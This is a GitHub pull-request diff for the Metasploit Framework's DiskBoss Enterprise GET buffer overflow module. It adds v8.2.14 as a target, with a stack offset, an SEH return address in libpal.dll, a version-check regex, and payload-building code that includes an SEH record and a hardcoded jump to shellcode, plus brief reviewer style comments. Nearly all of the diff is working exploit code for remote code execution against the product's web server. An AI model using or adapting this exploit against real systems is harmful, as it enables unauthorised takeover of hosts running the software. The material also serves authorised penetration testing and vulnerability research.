-
Notifications
You must be signed in to change notification settings - Fork 13.7k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Update DiskBoss Module (EDB 42395) #9268
Changes from 1 commit
File filter
Filter by extension
Conversations
Jump to
Diff view
Diff view
There are no files selected for viewing
Original file line number | Diff line number | Diff line change |
---|---|---|
|
@@ -14,20 +14,23 @@ def initialize(info = {}) | |
'Name' => 'DiskBoss Enterprise GET Buffer Overflow', | ||
'Description' => %q{ | ||
This module exploits a stack-based buffer overflow vulnerability | ||
in the web interface of DiskBoss Enterprise v7.5.12 and v7.4.28, | ||
in the web interface of DiskBoss Enterprise v7.5.12, v7.4.28, and v8.2.14, | ||
caused by improper bounds checking of the request path in HTTP GET | ||
requests sent to the built-in web server. This module has been | ||
tested successfully on Windows XP SP3 and Windows 7 SP1. | ||
}, | ||
'License' => MSF_LICENSE, | ||
'Author' => | ||
[ | ||
'vportal', # Vulnerability discovery and PoC | ||
'Gabor Seljan' # Metasploit module | ||
'vportal', # Vulnerability discovery and PoC | ||
'Gabor Seljan', # Metasploit module | ||
'Ahmad Mahfouz', # Vulnerability discovery and PoC | ||
'Jacob Robles' # Metasploit module | ||
], | ||
'References' => | ||
[ | ||
['EDB', '40869'] | ||
['EDB', '40869'], | ||
['EDB', '42395'] | ||
], | ||
'DefaultOptions' => | ||
{ | ||
|
@@ -60,6 +63,13 @@ def initialize(info = {}) | |
'Offset' => 2471, | ||
'Ret' => 0x100461da # ADD ESP,0x68 # RETN [libpal.dll] | ||
} | ||
], | ||
[ | ||
'DiskBoss Enterprise v8.2.14', | ||
{ | ||
'Offset' => 2496, | ||
'Ret' => 0x1002A8CA # SEH : # POP EDI # POP ESI # RET 04 [libpal.dll] | ||
} | ||
] | ||
], | ||
'Privileged' => true, | ||
|
@@ -74,7 +84,7 @@ def check | |
) | ||
|
||
if res && res.code == 200 | ||
if res.body =~ /DiskBoss Enterprise v7\.(4\.28|5\.12)/ | ||
if res.body =~ /DiskBoss Enterprise v(7\.4\.28|7\.5\.12|8\.2\.14)/ | ||
return Exploit::CheckCode::Vulnerable | ||
elsif res.body =~ /DiskBoss Enterprise/ | ||
return Exploit::CheckCode::Detected | ||
|
@@ -105,6 +115,8 @@ def exploit | |
mytarget = targets[1] | ||
elsif res.body =~ /DiskBoss Enterprise v7\.5\.12/ | ||
mytarget = targets[2] | ||
elsif res.body =~ /DiskBoss Enterprise v8\.2\.14/ | ||
mytarget = targets[3] | ||
end | ||
end | ||
|
||
|
@@ -115,11 +127,22 @@ def exploit | |
print_status("Selected Target: #{mytarget.name}") | ||
end | ||
|
||
sploit = make_nops(21) | ||
sploit << payload.encoded | ||
sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length) | ||
sploit << [mytarget.ret].pack('V') | ||
sploit << rand_text_alpha(2500) | ||
if !(mytarget == targets[3]) | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. How about rewriting this to use positive logic?
|
||
sploit = make_nops(21) | ||
sploit << payload.encoded | ||
sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length) | ||
sploit << [mytarget.ret].pack('V') | ||
sploit << rand_text_alpha(2500) | ||
else | ||
seh = generate_seh_record(mytarget.ret) | ||
sploit = payload.encoded | ||
sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length) | ||
sploit[sploit.length, seh.length] = seh | ||
sploit << make_nops(10) | ||
sploit << "\xE9\x25\xBF\xFF\xFF" # JMP to ShellCode | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. How about There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. I took a note to look this up and add it later, will land for now. Thx! |
||
sploit << rand_text_alpha(5000 - sploit.length) | ||
|
||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Nix this newline when you refactor. |
||
end | ||
|
||
send_request_cgi( | ||
'method' => 'GET', | ||
|
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I'd reorder to put your name next to Gabor's.